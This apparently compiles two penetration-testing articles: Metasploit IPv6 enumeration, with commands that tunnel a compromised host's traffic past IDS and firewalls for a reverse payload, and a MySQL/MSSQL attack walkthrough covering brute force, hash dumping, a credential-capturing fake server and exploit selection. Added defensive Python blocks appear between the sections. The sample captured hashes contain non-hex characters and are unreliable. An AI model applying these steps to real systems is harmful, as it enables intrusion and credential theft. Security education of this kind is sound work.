Let’s take a closer look at the IPv6 multicast addresses we ping with this module. IPv6 addresses have a “scope” in which they are considered valid and unique. This could be an address in the global scope, the site scope, link-local or interface-local scope. Each scope features a well-known multicast address, which certain types of host are expected to join. The module has a sequential list of those addresses that it works its way through. We can pull those addresses from the Ruby code for the module.

• FF01::1 – All nodes on the interface-local scope.
• FF01::2 – All routers in the interface-local scope.
• FF02::1 – All nodes in the link-local scope.
• FF02::2 – All routers on the link-local scope.
• FF02::5 – All OSPFv3 link state routers.
• FF02::6 – All OSPFv3 designated routers.
• FF02::9 – All RIP routers.
• FF02::a – All EIGRP routers.
• FF02::d – All Protocol Independent Multicast routers.
• FF02::16 – Multicast Listener Discovery reports.
• FF02::1:2 – All DHCP servers in the link-local scope.
• FF05::1:3 – All DHCP servers in the site-local scope.

To better understand the idea of IPv6 scopes we can compare them to their IPv4 equivalents. The global scope is best compared to any public IP address range in IPv4. A global IPv6 address can uniquely identify a host on the Internet. Site-local should be considered equivalent to RFC1918 private IP addressing and is used within a specific site, such as an office. Interface-local is similar to an APIPA or 169.* IPv4 address, and is automatically generated to allow communication across a link without the need for any other routing information. One difference between link-local addresses in IPv6 and IPv4 is that there always needs to be one assigned to every IPv6 enabled interface – even when it has other addresses. That means that as long as there is IPv6 on the network, there will be link-local addresses in the link-local multicast scope. You can spot a link-local address because it will have the prefix “fe80”. As you might expect, these addresses cannot be routed over the Internet. So while they can be used to communicate with a machine in the same layer 2 broadcast domain as the host you are working from, if you want to be able to have fun across the IPv6 Internet, a global address is required. We’ll talk about obtaining one of those later.

Our next Metasploit module is “ipv6_neighbor”, created by belch. This enumeration module takes advantage of the Neighbor Discovery Protocol (NDP). NDP uses a subset of ICMPv6 packets to perform various auto-configuration and link state monitoring tasks, and the module uses it to find the link-local addresses of IPv6 hosts within the same segment. As an aside, one such NDP task is determining if a host’s intended link-local address is already in use. This process, imaginatively called duplicate address detection (DAD), is actually prone to denial of service. Tools exist, although not presently available as Metasploit modules, which will respond to all DAD requests with “address in use” messages. This will prevent any new IPv6 device that joins the network from configuring a link-local address, as every option it advertises will be reported as a duplicate. One such tool for this task is “dos-new-ip6” written by van Hauser. Back to the module in question. Its purpose is to take an IPv4 range and show you the relationship between the IPv4 and IPv6 addresses on the target network. This allows you to quickly identify which hosts are dual-stacked, that is, running both IPv4 and IPv6 side by side (Figure 4).

Figure 4. Mapping the relationship between IPv4 and IPv6 link-local addresses



To do this it actually completes two tasks as part of its execution. The first is a blast from the past – we perform an ARP sweep of the given IPv4 range, to learn the MAC address of each IPv4 host. Secondly it will send an ICMPv6 neighbor solicitation packet, from which we’ll learn the MAC address of the IPv6 enabled host. Compare the two MAC addresses; if any match, we have our mapping. Seeing these two processes side-by-side is interesting, as ICMPv6 neighbor discovery is IPv6’s ARP replacement, and we can compare the way they go about doing the same job. Unlike IPv4, IPv6 does not implement broadcast. The reason for this is efficiency. Traditional ARP uses broadcast to query all the hosts on the subnet to find the MAC address of an IPv4 host so it can make a layer 2 delivery. In other words, everyone gets bugged every time someone wants to locate a MAC address. In IPv6, the process relies on multicasting, which means that fewer hosts get bugged and the address resolution process is much quicker. Neighbor solicitation packets are sent to a special kind of multicast address, known as a solicited-node multicast address. Each IPv6 interface will have such an address and its purpose is to provide the layer 2 (MAC) address of the host. These addresses are generated using a simple algorithm, which drops all but the last 24 bits of the host’s regular unicast address and prepends the prefix FF02::1:FF00:0/104. Using Wireshark to capture the ICMPv6 packets sent out by the Metasploit module we can see these addresses in action (Figure 5). Notice how in packets 231 and 232, we send a neighbor solicitation to the solicited-node multicast address ff02::1:ff8f:ddb3, and we get our response back in the form of a neighbor advertisement from the unicast link-local address of the host (fe80::7256:81ff:fe8f:ddb3).

An ICMPv6 neighbor advertisement can either be sent in response to a solicitation, as we’ve just shown, or it can be sent unsolicited to an all-nodes multicast address to inform neighbors of a change in address or link state. The final scanner module currently in Metasploit is ipv6_neighbor_router_advertisement, which like ipv6_multicast_ping is also written by wuntee. ICMPv6 router advertisements and solicitations are fairly similar to neighbor advertisements and solicitations, but as you can probably guess, are used to discover routers rather than “regular” hosts. Routers transmit advertisements on a regular basis via multicast, and also in response to router solicitations from hosts on the network.
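The address arithmetic behind these modules, as an added example that is not part of the original article or of Metasploit: the solicited-node multicast address used by ipv6_neighbor, the modified EUI-64 link-local address a host derives from its MAC, the prefix swap that ipv6_neighbor_router_advertisement performs on an auto-configured global address, and the ARP-versus-NDP MAC correlation that yields the dual-stack mapping. The MAC 70:56:81:8f:dd:b3 is an assumption, chosen because it produces the fe80::7256:81ff:fe8f:ddb3 address seen in the capture; all tables are constructed sample data.

```python
import ipaddress

# Constructed sample data: the link-local address from the article's Wireshark
# capture and a MAC (assumption) from which EUI-64 would produce it.
SAMPLE_LINK_LOCAL = "fe80::7256:81ff:fe8f:ddb3"
SAMPLE_MAC = "70:56:81:8f:dd:b3"


def solicited_node_multicast(addr: str) -> str:
    """Solicited-node multicast address for a unicast IPv6 address:
    keep the low 24 bits of the address, prepend ff02::1:ff00:0/104."""
    low24 = int(ipaddress.IPv6Address(addr)) & 0xFFFFFF
    prefix = int(ipaddress.IPv6Address("ff02::1:ff00:0"))
    return str(ipaddress.IPv6Address(prefix | low24))


def link_local_from_mac(mac: str) -> str:
    """Modified EUI-64 link-local address (RFC 4291 Appendix A): split the MAC,
    insert ff:fe in the middle and flip the universal/local bit of the first octet."""
    octets = bytes.fromhex(mac.replace(":", "").replace("-", ""))
    if len(octets) != 6:
        raise ValueError(f"not a 48-bit MAC address: {mac}")
    iid = bytearray(octets[:3] + b"\xff\xfe" + octets[3:])
    iid[0] ^= 0x02
    return str(ipaddress.IPv6Address(b"\xfe\x80" + bytes(6) + bytes(iid)))


def link_local_from_global(addr: str) -> str:
    """The manipulation ipv6_neighbor_router_advertisement relies on: drop the
    advertised global /64 prefix and put fe80::/64 in front of the interface ID.
    Only valid when the host reuses one interface ID for all its addresses."""
    iid = int(ipaddress.IPv6Address(addr)) & ((1 << 64) - 1)
    return str(ipaddress.IPv6Address((0xFE80 << 112) | iid))


def map_dual_stack(arp_table: dict, ndp_table: dict) -> list:
    """Correlate an ARP sweep result {ipv4: mac} with neighbor solicitation
    results {ipv6: mac} the way ipv6_neighbor does: a shared MAC means the
    IPv4 and IPv6 addresses belong to the same (dual-stacked) host."""
    by_mac = {}
    for ip6, mac in ndp_table.items():
        by_mac.setdefault(mac.lower(), []).append(ip6)
    pairs = []
    for ip4, mac in arp_table.items():
        for ip6 in by_mac.get(mac.lower(), []):
            pairs.append((ip4, ip6, mac.lower()))
    return sorted(pairs)


if __name__ == "__main__":
    print(solicited_node_multicast(SAMPLE_LINK_LOCAL))  # ff02::1:ff8f:ddb3
    print(link_local_from_mac(SAMPLE_MAC))              # fe80::7256:81ff:fe8f:ddb3
    print(link_local_from_global("2001:1234:dead:beef:7256:81ff:fe8f:ddb3"))
    # Constructed tables: one host answers both ARP and NDP, one is IPv4-only.
    arp = {"192.168.0.115": "70:56:81:8F:DD:B3", "192.168.0.1": "00:11:22:33:44:55"}
    ndp = {SAMPLE_LINK_LOCAL: SAMPLE_MAC}
    for ip4, ip6, mac in map_dual_stack(arp, ndp):
        print(f"{ip4:<16} {ip6:<28} {mac}")
```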


This module will aim to enumerate link-local IPv6 addresses by crafting and transmitting false router advertisements for a new network prefix via multicast. In turn this will trigger any hosts in that multicast scope to start the auto-configuration process, create a new global IPv6 address on their interface and send a neighbor advertisement for that address. The module then manipulates the IPv6 address in the advertisement, dropping the newly acquired global prefix and replacing it with the standard link-local prefix. Finally, to confirm that the enumerated address is in fact alive it sends out a neighbor solicitation message. This works under the assumption that the operating system uses the same interface portion of the IPv6 address on all of its addresses (Figure 6).

So let’s take a closer look at the module in action. We don’t need to provide any options other than a couple of timeout parameters, which by default are set at 5 and 1 seconds respectively. Once we run the module it will begin sending advertisements for the network prefix 2001:1234:dead:beef to the multicast address FF02::1, which as we know from earlier is “all nodes in the link-local scope”. Incidentally, this network prefix is hard coded into the module’s source (Figure 7). Upon receipt of the advertisement all hosts on the local scope will begin auto-configuration of a new IPv6 address within the new prefix (Figure 8).

Of the three enumeration modules we’ve looked at, this is by far the noisiest and therefore the most likely to be detected. We are actually taking the time to set an address on the remote host, and there is no guarantee that the interface portion of the new address will match the link-local address calculated by the module. Some systems implement randomization in the interface portion. Having said that, it’s always good to have different ways of achieving the same goal!

Figure 5. ICMPv6 NDP packets, sent initially to the solicited-node multicast addresses of each host

Figure 6. Using false router advertisements with “ipv6_neighbor_router_advertisement” to obtain link-local addresses

Figure 7. Sending an ICMPv6 router advertisement message for the network prefix “2001:1234:dead:beef”, as captured by Wireshark

So far we’ve concentrated on the auxiliary modules in the Metasploit framework and doing some basic IPv6 enumeration in the link-local scope. This is an important first step and assumes that you already have some sort of foothold into the network, but let’s say we now want to take things one step further. We are going to try to break out onto the IPv6 Internet, and that means we’ll need a tunnel. The idea of tunneling out using IPv6 encapsulated in IPv4 packets is a very attractive proposition, as many controls, such as IPS/IDS and firewalls, will not be configured to alert on or prevent such traffic leaving.

So the scenario is as follows – we’ve compromised a Linux machine using Metasploit and we have a shell. The host has IPv6 support and a link-local address. Now we want to create a global IPv6 address on the box to allow it to communicate back to us over the IPv6 Internet for extra obscurity. You need two things to get an IPv6 tunnel to work – a tunnel broker, of which there are plenty, many of them free of charge. Secondly, if the box you are working on is behind a NAT device, it must support the forwarding of protocol 41 – in other words, IPv6 encapsulated in IPv4. If we are behind a NAT device that doesn’t forward protocol 41, we are out of luck (Figure 9).

For the purposes of this example I’ll be using a tunnel provided by Hurricane Electric (he.net). Once signed up, the tunnel broker provides both a client and server IPv6 address, and an IPv4 address of the tunnel broker server. These values will be as follows:

HE.net Tunnel Server IPv4 address – 72.52.104.74
HE.net Tunnel Server IPv6 address – 2001:DB8::20
Target Network Outside NAT IPv4 address – 1.1.1.1
Target Machine IPv4 Address – 192.168.0.115
Target Machine IPv6 Address – 2001:DB8::21

Note: You may have noticed the outside IPv4 and IPv6 addresses used in this example will not work in real life. The IPv6 address prefix I’ve used is reserved for documentation, and is not routable over the Internet. When configuring the tunnel in the he.net site, you must provide the outside IPv4 address of the target.

It should also be noted that the he.net site requires that this address responds to ping (Figure 10). Back on our victim machine, we run a few commands to bring up the new tunnel interface and set up a route to ensure all IPv6 traffic goes via that new interface.

ip tunnel add ipv6inet mode sit remote 72.52.104.74 local 192.168.0.115 ttl 255
This creates a SIT (simple internet transition) interface named ipv6inet and defines the local and remote IPv4 addresses for the tunnel endpoints, or in other words, the IP of the target machine and tunnel server.

ip link set ipv6inet up
This brings the tunnel interface up.

ip addr add 2001:db8::21 dev ipv6inet
This assigns the IPv6 address to the interface.

ip route add ::/0 dev ipv6inet
This command adds a route to send all IPv6 traffic across the new tunnel interface (Figure 11).

A quick way to confirm that the IPv6 Internet is now within our reach is to use the ping6 utility to hit an IPv6 website. In this case ipv6.google.com, which has the address 2607:f8b0:400e:c00::93. This tunnel can now be used by a Metasploit reverse connection payload to connect to an attacker with a global IPv6 address of their own, which of course can be obtained in exactly the same way as we’ve just shown. Let’s say in this example we want our payload to connect back to us at the address 2001:db8::99 (Figure 13). Configuring an IPv6 payload in Metasploit is essentially the same as an IPv4 payload, but there are a couple of minor differences. Obviously, you must specify an IPv6 address for your listener (or target if a binding payload), and also if using a link-local address on a host with multiple interfaces, you should specify the scope ID. To summarize, let’s take one last look at the scenario we’ve just discussed (Figure 14).

Figure 8. Two outputs of “ifconfig” on a Mac OS X machine on the same network as our Metasploit instance. The first output is pre-false advertisement, the second is just after. Notice the addition of a “dead:beef” IPv6 address, thanks to auto-configuration

Figure 9. On the compromised Linux host “webapp1”, eth0 has an IPv4 and a link-local IPv6 address

Figure 10. Signing up for an IPv6 tunnel from Hurricane Electric (ipv6.he.net)

Figure 11. Creating an IPv6 tunnel interface on the target machine
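The tunnel just described leaves the network as IPv4 packets carrying protocol 41, which is exactly what an IPv4-only IDS rule set ignores. As an added example (not from the article or from Metasploit), the following parses the outer IPv4 and inner IPv6 headers of such a packet and raises an alert for any 6in4 traffic to a tunnel endpoint that is not on an approved list. The packet builder produces constructed samples with zero checksums for inspection only; the addresses reuse the scenario above (192.168.0.115 to 72.52.104.74, inner 2001:db8::21 to 2001:db8::99).

```python
import ipaddress
import struct

PROTO_IPV6_IN_IPV4 = 41  # "protocol 41": the encapsulation used by a SIT tunnel
IPV4_HEADER = "!BBHHHBBH4s4s"  # version/IHL, TOS, total length, id, flags/frag,
                               # TTL, protocol, checksum, src, dst (20 bytes)
IPV6_FIXED = "!IHBB"           # version/TC/flow, payload length, next header, hop limit


def build_6in4(outer_src, outer_dst, inner_src, inner_dst,
               inner_next_header=6, payload=b""):
    """Constructed sample: an IPv6 packet encapsulated in IPv4. Checksums are
    left at zero, which is enough for header inspection but not for sending."""
    ip6 = (struct.pack(IPV6_FIXED, 0x60000000, len(payload), inner_next_header, 64)
           + ipaddress.IPv6Address(inner_src).packed
           + ipaddress.IPv6Address(inner_dst).packed
           + payload)
    ip4 = struct.pack(IPV4_HEADER, 0x45, 0, 20 + len(ip6), 0, 0, 255,
                      PROTO_IPV6_IN_IPV4, 0,
                      ipaddress.IPv4Address(outer_src).packed,
                      ipaddress.IPv4Address(outer_dst).packed)
    return ip4 + ip6


def inspect_6in4(packet: bytes):
    """Return outer and inner endpoints of a 6in4 packet, or None when the
    packet is not IPv4 with protocol 41 carrying a complete IPv6 header."""
    if len(packet) < 20:
        return None
    fields = struct.unpack(IPV4_HEADER, packet[:20])
    ver_ihl, proto, src, dst = fields[0], fields[6], fields[8], fields[9]
    if ver_ihl >> 4 != 4 or proto != PROTO_IPV6_IN_IPV4:
        return None
    inner = packet[(ver_ihl & 0x0F) * 4:]      # skip IPv4 options, if any
    if len(inner) < 40 or inner[0] >> 4 != 6:  # truncated or not IPv6 inside
        return None
    _, payload_len, next_header, _ = struct.unpack(IPV6_FIXED, inner[:8])
    return {
        "outer_src": str(ipaddress.IPv4Address(src)),
        "outer_dst": str(ipaddress.IPv4Address(dst)),
        "inner_src": str(ipaddress.IPv6Address(inner[8:24])),
        "inner_dst": str(ipaddress.IPv6Address(inner[24:40])),
        "inner_next_header": next_header,
        "inner_payload_len": payload_len,
    }


def tunnel_alerts(packets, approved_tunnel_endpoints=frozenset()):
    """One alert line per 6in4 packet whose outer destination is not an
    approved tunnel endpoint; non-tunnel packets are ignored."""
    alerts = []
    for pkt in packets:
        info = inspect_6in4(pkt)
        if info is None or info["outer_dst"] in approved_tunnel_endpoints:
            continue
        alerts.append(
            f"6in4 to unapproved endpoint {info['outer_dst']} from {info['outer_src']}: "
            f"inner {info['inner_src']} -> {info['inner_dst']} "
            f"(next header {info['inner_next_header']})")
    return alerts


if __name__ == "__main__":
    # Constructed: the reverse-connection TCP flow from the scenario above.
    sample = build_6in4("192.168.0.115", "72.52.104.74",
                        "2001:db8::21", "2001:db8::99", 6, b"\x00" * 20)
    for line in tunnel_alerts([sample]):
        print(line)
```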

Conclusion

For many out there, the mere sight of an IPv6 address is enough to put them off learning more about the protocol. This is the biggest vulnerability in IPv6, and like most security vulnerabilities, it’s a human problem. The protocol is being adopted in devices at a much quicker rate than people are willing to manage and configure it properly.

For attackers, this provides great opportunities to jump on the unmanaged jumble and use it to build something that can be used to move around networks in ways that the owners of those networks aren’t expecting. For defenders, this means developing a whole new security model with emphasis on securing the endpoints rather than the perimeter. After all, IPv6 doesn’t hide behind NAT like its predecessor. By introducing IPv6 payloads and modules the Metasploit framework has given both groups new tools to better understand and manipulate the IPv6 protocol. Of course, we are only just getting started. The nature of the Metasploit community is to constantly build, innovate and improve upon what is already in place. These initial modules will act as a catalyst for further development in IPv6 enumeration and exploitation. Remember that the next time you run “msfupdate”, and keep one eye open for new ways to use IPv6 for exploitation.

Figure 12. Sending ping packets to Google over the IPv6 Internet using our new tunnel interface

Figure 13. Setting up an IPv6 payload in Metasploit

Mike Sheward

Figure 14. An overview of our IPv6-over-IPv4 tunnel set up


Mike Sheward is a security specialist for a software-as-a-service provider based in Seattle. He began his career as a network engineer working in the British public sector. During this time he developed a passion for security and started on a path that led him to a full-time security role with a private organization. Mike has performed penetration testing for a wide range of public and private sector clients, has been involved in a number of digital forensics investigations and has delivered security training to fellow IT professionals.


How to Use Sqlploit?

Databases nowadays are everywhere, from the smallest desktop applications to the largest web sites such as Facebook. Critical business information is stored in database servers that are often poorly secured.

Someone with access to this information could have control over a company’s or an organization’s infrastructure. He could even sell this information to a company’s competitors. Imagine the damage that something like this could cause. In this article, we will see how we can use Metasploit to attack our database servers. Metasploit is a very powerful tool. Actually, it is not just a tool, it is a collection of tools. It is a whole framework. It has gained incredible popularity in the last few years because of its success in the fields of penetration testing and information security. It includes various tools, from various scanners to exploits. It can be used to discover software vulnerabilities and exploit them. With database servers having so many security weaknesses, Metasploit has numerous auxiliary modules and exploits to assist you with your database server penetration testing. Metasploit is available for all popular operating systems, so the operating system you are already using should not be a problem. In this article we are going to use Metasploit’s auxiliary modules and exploits to complete various penetration testing tasks against popular database servers, such as Microsoft SQL Server and MySQL. I hope you enjoy it!

Attacking a MySQL Database Server

MySQL is the world’s most used open source relational database management system. Its source code is available under the terms of the GNU General Public License and other proprietary license agreements. MySQL is the first database choice when it comes to open source application development. MySQL is a very secure database system, but as with any software that is publicly accessible, you can’t take anything for granted.

Discover open MySQL ports

MySQL is running by default on port 3306. To discover MySQL you can use either nmap or Metasploit’s auxiliary modules.

The NMAP way

Nmap is a free and open source network discovery and security auditing utility. It can discover open ports, running services, operating system version and much more. To discover open MySQL ports we use it in this way:

nmap -sT -sV -Pn -p 3306 192.168.200.133

Parameters:

• -sT: TCP connect scan
• -sV: Determine service version information
• -Pn: Ignore host discovery
• -p 3306: Scan port 3306

Figure 1. Discovering MySQL servers – The nmap way


Scanning the whole network:

nmap -sT -sV -Pn --open -p 3306 192.168.200.0/24

Parameters:

• --open: Show only open ports (Figure 2)

The Metasploit way

Metasploit offers the auxiliary module mysql_version. This module enumerates the version of running MySQL servers. To use it type:

use auxiliary/scanner/mysql/mysql_version

To use this scanner you have to set its options. Type:

show options

to see a list of available options (Figure 3). Set the RHOSTS parameter:

set RHOSTS 192.168.200.133

or

set RHOSTS 192.168.200.0/24

Set the RPORT parameter to a different value if you believe that the MySQL Server is listening on a different port:

Set RPORT 3333

Increase the THREADS value for faster scanning (Figure 4):

set THREADS 50

Now, all you have to type is:

run

and hit enter (Figure 5).

As you can see from the screenshot we have MySQL version 5.0.51a running at 192.168.200.133!

Brute forcing MySQL

There is an auxiliary module in Metasploit called mysql_login which will happily query a MySQL server for specific usernames and passwords. The options for this module are shown in Figure 6. To start your attack you have to set the RHOSTS option and choose a username and a password.

SET RHOSTS 192.168.200.133
SET USERNAME root

Figure 2. Discovering MySQL servers – The nmap way

Figure 3. mysql_version auxiliary module options

Figure 4. mysql_version options after setting them up

Figure 5. mysql_version scanner in action

Figure 6. mysql_login module options

Hakin9 Exploiting Software

Leave the password blank. Your options, after executing the commands above, should look like Figure 6. mysql_login will try to log in with a blank password and with the username as the password. Maybe we are lucky before we start brute-forcing the database with password lists (Figure 7). We were lucky! The administrator is completely ignorant. But what if we weren't so lucky? We then need a password list file. We can create one by ourselves or download one from the Internet. Let's create one!

Creating a password list

To create our password list we are going to use crunch. If you are using BackTrack, crunch is already installed. Open Privilege Escalation > Password Attacks > Offline Attacks > crunch. Otherwise download it from here: http://sourceforge.net/projects/crunch-wordlist/. Execute:

./crunch 6 8 abcde123456 -o passfile.lst

The above command will create passwords between 6 and 8 characters long, consisting of the ASCII characters a, b, c, d, e and the digits 1, 2, 3, 4, 5, 6, and will save the list into the file passfile.lst (Figure 8).

Using password lists

Now that we have our password list stored in /pentest/passwords/crunch/passfile.lst, we can use it in the mysql_login module:

set PASS_FILE /pentest/passwords/crunch/passfile.lst

Increase also the number of concurrent threads for a faster brute-force attack:

set THREADS 50
run

The mysql_login module (Figure 9) offers two other options, USER_FILE and USERPASS_FILE. You can use a username list file to try various username values by setting the USER_FILE option accordingly. With the USERPASS_FILE parameter you can use a file which contains both usernames and passwords in the same file, separated by a space and one pair per line.

Bypass MySQL Authentication

The module mysql_authbypass_hashdump exploits a password bypass vulnerability in MySQL and can extract usernames and encrypted password hashes from a MySQL server. To select it type:

use auxiliary/scanner/mysql/mysql_authbypass_hashdump

Set the RHOSTS and THREADS options:

Figure 7. Starting brute-forcing the database with password lists
Figure 8. Generating a password list with crunch
Figure 9. mysql brute-force attack using password list
Figure 10. Running mysql_authbypass_hashdump module
Figure 11. mysql server hashes and usernames

set RHOSTS 192.168.200.133
set THREADS 50

and run the module. We can also set the USERNAME parameter:

set USERNAME root

Unlucky! (Figure 10)

Dump MySQL Password Hashes

mysql_hashdump extracts the usernames and encrypted password hashes from a MySQL server. One can then use the jtr_mysql_fast module to crack them. The module is located in auxiliary/scanner/mysql. To use it, set the RHOSTS option to our target's IP address and increase the THREADS value. If you have managed to reveal the root password then set also the USERNAME and PASSWORD options. Run the module to get your precious results! (Figure 11)

Cracking passwords with John The Ripper

Metasploit offers the module jtr_mysql_fast. This module uses John the Ripper to identify weak passwords that have been acquired from the mysql_hashdump module. John the Ripper is a free and open source password cracker, available for many operating systems such as Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. After having acquired MySQL hashes with the mysql_hashdump module, load the jtr_mysql_fast module and run it:

use auxiliary/analyze/jtr_mysql_fast
run

This module offers options such as setting a custom path for John the Ripper. The option that interests you the most is the Wordlist option, which is the path to your desired password list (Figure 12).

Getting the schema

A database schema describes in a formal language the structure of the database, the organization of the data, how the tables, their fields and the relationships between them must be defined, and more. In general, a database schema defines the way the database should be constructed. Metasploit has the module mysql_schemadump to get the MySQL schema. mysql_schemadump is located under auxiliary/scanner/mysql. To use it you have to set the RHOSTS, USERNAME and PASSWORD options. If you are scanning more than one host, increase the THREADS value!

Figure 12. jtr_mysql_fast module options
Figure 13. mysql capture module options
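The blank root password found above and the hashes mysql_hashdump pulls both sit in the mysql.user table, which an administrator can audit directly before anyone else does. Added Python example, not code from the article or from Metasploit: it flags blank passwords, pre-4.1 hashes, anonymous accounts, root reachable from any host, and passwords equal to the username or to a short list of common choices, which is what mysql_login tries first. The rows, the legacy hash and the guess list are constructed.

```python
import hashlib
import re

OLD_HASH = re.compile(r"^[0-9a-f]{16}$")       # pre-4.1 format, 16 hex digits
NEW_HASH = re.compile(r"^\*[0-9A-F]{40}$")     # 4.1+ format: "*" + SHA1(SHA1(pw))


def mysql_native_hash(password: str) -> str:
    """PASSWORD() as MySQL 4.1+ computes it (the mysql_native_password scheme)."""
    stage1 = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(stage1).hexdigest().upper()


def audit_user_table(rows, weak_guesses=("password", "root", "admin", "123456")):
    """rows: (user, host, password) tuples, i.e. the result of
    SELECT user, host, password FROM mysql.user on MySQL 5.0-5.6
    (the column is called authentication_string from 5.7 on)."""
    findings = []
    for user, host, pw in rows:
        who = f"'{user}'@'{host}'"
        if user == "":
            findings.append((who, "anonymous account"))
        if pw == "":
            findings.append((who, "blank password"))
        elif OLD_HASH.match(pw):
            findings.append((who, "pre-4.1 password hash"))
        elif NEW_HASH.match(pw):
            # the username first, then a few favourites: the same order mysql_login uses
            for guess in (user, *weak_guesses):
                if guess and mysql_native_hash(guess) == pw:
                    findings.append((who, f"password is '{guess}'"))
                    break
        else:
            findings.append((who, "unrecognised hash format"))
        if host == "%" and user in ("root", ""):
            findings.append((who, "accessible from any host"))
    return findings


# Constructed rows, not the article's target; hashes computed above so the sample is self-consistent.
SAMPLE_ROWS = [
    ("root", "localhost", ""),                                 # blank password
    ("root", "%", mysql_native_hash("root")),                  # username as password, any host
    ("app", "192.168.200.%", mysql_native_hash("Xk9#vQ2!pL7")),
    ("legacy", "localhost", "5d2e19393cc5ef67"),               # pre-4.1 hash (constructed)
    ("", "localhost", ""),                                     # anonymous account
]

if __name__ == "__main__":
    for who, problem in audit_user_table(SAMPLE_ROWS):
        print(f"{who}: {problem}")
```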

Let's go Phishing

Phishing is an attempt to steal sensitive information by impersonating a well known organization. In the same manner you can trick a user and steal her MySQL credentials. One of Metasploit's abilities is exactly this: to mimic known services and capture user credentials. Among the various capture modules there is a module called mysql. This module provides a fake MySQL service that is designed to capture MySQL server authentication credentials. It captures challenge and response pairs that can be supplied to Cain or John the Ripper for cracking. To select the capture module type:

use auxiliary/server/capture/mysql

This module offers some interesting options. You can set the CAINPWFILE option to store captured hashes in Cain & Abel format or JOHNPWFILE to store hashes in John the Ripper format. Leave the SRVHOST option as it is, 0.0.0.0, to listen on the local host. You can also set the SRVVERSION option, which is the version of the MySQL server that will be reported to clients in the greeting response. This option must agree with the true MySQL server version on the network if you don't want to be detected. You can also configure the module to use SSL! (Figure 13) Run the module and connect to the capture MySQL server from another computer on the network to see how it works. To connect to a MySQL server open a terminal and type:

mysql -h ip_address -u root -p

Enter any password, for now, at mysql's prompt and see what is happening in Metasploit! (Figure 14) Metasploit has captured the hash and now this hash is stored in Cain and John format in the files /tmp/john and /tmp/cain. These are the files that I have chosen.

Cain format:

root NULL 94e243cab3181cvef73852s3011651369196a928 112263447569708899agbbfcddneff2113434455 SHA1

John format:

root:$mysqlna$1112263447569708899agbbfcddneff2113434455*94e243cab3181cvef73852s3011651369196a928

MySQL Exploiting

The MySQL database system is a very secure piece of software. Metasploit doesn't offer many MySQL exploits, although some exploits exist.

YaSSL Exploits

YaSSL is a lightweight embedded SSL library. Metasploit offers two exploits for this library, mysql_yassl_getname and mysql_yassl_hello. mysql_yassl_getname exploits a stack buffer overflow in yaSSL 1.9.8 and earlier, and mysql_yassl_hello exploits a stack buffer overflow in yaSSL 1.7.5 and earlier. To use any exploit you have to select it:

use exploit/linux/mysql/mysql_yassl_getname
use exploit/linux/mysql/mysql_yassl_hello
use exploit/windows/mysql/mysql_yassl_hello

As you can figure, the last exploit is for Windows systems. After selecting your desired exploit, you have to select the payload. Each exploit offers a variety of payloads. You have to choose the most suitable for your target. To see a list of available payloads for the exploit type (Figure 15):

show payloads

The most successful payloads are usually the reverse_tcp ones, where the target machine connects back to you. Each payload offers some options. By typing

show options

you will see the exploit's and payload's options (Figure 16).

Other MySQL Exploits

We should mention here two more exploits that are available for MySQL systems that run on Windows servers: mysql_payload and scrutinizer_upload_exec. The first exploit, mysql_payload, creates and enables a custom UDF on the target. On default Microsoft Windows installations of MySQL 5.5.9 and earlier, directory write permissions are not enforced, and the MySQL service runs as LocalSystem. This module will leave a payload executable on the target system and the UDF DLL, and will define or redefine the sys_eval() and sys_exec() functions. The scrutinizer_upload_exec module exploits an insecure configuration found in Scrutinizer NetFlow & sFlow Analyzer, a network traffic monitoring and analysis tool. By default, the software installs a default password in MySQL and binds the service to "0.0.0.0". This allows any remote user to log in to MySQL and then gain arbitrary remote code execution under the context of 'SYSTEM'.

We are in!

And now what?

Metasploit offers two modules that will assist you to enumerate a MySQL service or execute SQL queries. All you need is a valid user-password pair. mysql_enum allows for simple enumeration of a MySQL Database Server and mysql_sql allows simple SQL statements to be executed against a MySQL instance. To select them, type:

use auxiliary/admin/mysql/mysql_enum

and execute the command

show options

to get a list of available options (Figure 17). To use mysql_sql execute (Figure 18):

use auxiliary/admin/mysql/mysql_sql

and

show options

Figure 14. mysql capture module in action
Figure 15. Exploit's and payload's options
Figure 16. mysql_yassl_hello exploit payloads
Figure 17. mysql_enum module options
Figure 18. mysql_sql module options

Attacking a Microsoft SQL Server

Microsoft SQL Server (MSSQL) is a relational database management system (RDBMS) used to store, retrieve and manage information. As with many of Microsoft's products, SQL Server has many security weaknesses. Let's start by identifying running SQL servers on the network.

Discover open MSSQL ports

MSSQL runs by default on port 1433. To discover SQL Server you can use either nmap or Metasploit's auxiliary module.

The NMAP way

To discover open MSSQL ports we execute the following command:

nmap -sT -sV -Pn -p 1433 192.168.200.133

Usually, when administrators need more than one instance of SQL Server, they run the second instance on port 1434:

nmap -sT -sV -Pn -p 1433,1434 192.168.200.133

Parameters:
-sT: TCP connect scan
-sV: Determine service version information
-Pn: Ignore host discovery
-p 1433,1434: Scan ports 1433 and 1434

Scanning the whole network:

nmap -sT -sV -Pn --open -p 1433,1434 192.168.200.0/24

Parameters:
--open: Show only open ports

Figure 19. mssql_ping module options
Figure 20. mssql_ping module in action

The Metasploit way

Metasploit offers the auxiliary module mssql_ping. This module discovers running MSSQL services. To use it, type:

use auxiliary/scanner/mssql/mssql_ping

Type:

show options

for a list of available options (Figure 19). To discover all running MSSQL services on the net, set the RHOSTS value equal to 192.168.200.0/24, assuming that your target network is in this range, increase the THREADS value for faster scanning and run the module (Figure 20).

Brute forcing MSSQL

The auxiliary module mssql_login works in the same manner as mysql_login does. It will query the MSSQL instance for a specific username and password pair. The options for this module are shown in Figure 21. The default administrator's username for SQL Server is sa. In the options of this module you can specify a specific password, or a password list, a username list or a username-password list where usernames and passwords are separated by a space and each pair is on a new line. Having set your options, simply run the module and wait for your results! You can create your own password list file, like we did in the first chapter where we used the mysql_login module.
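Both mysql_login and mssql_login leave a trail in the server's own log: one source address, many failures within seconds, often across several usernames. Added Python example, not code from the article or from Metasploit: it parses failed-login lines from a MySQL error log (log_warnings set to 2) and from a SQL Server ERRORLOG and alerts per source address on a sliding window. The log lines, addresses and thresholds are constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# MySQL 5.0/5.1 error log entry written when log_warnings is 2 or higher.
MYSQL_RE = re.compile(
    r"^(?P<ts>\d{6} {1,2}\d{1,2}:\d{2}:\d{2}) \[Warning\] Access denied for user "
    r"'(?P<user>[^']*)'@'(?P<src>[^']+)'")
# SQL Server ERRORLOG entry for a failed login, with the client address.
MSSQL_RE = re.compile(
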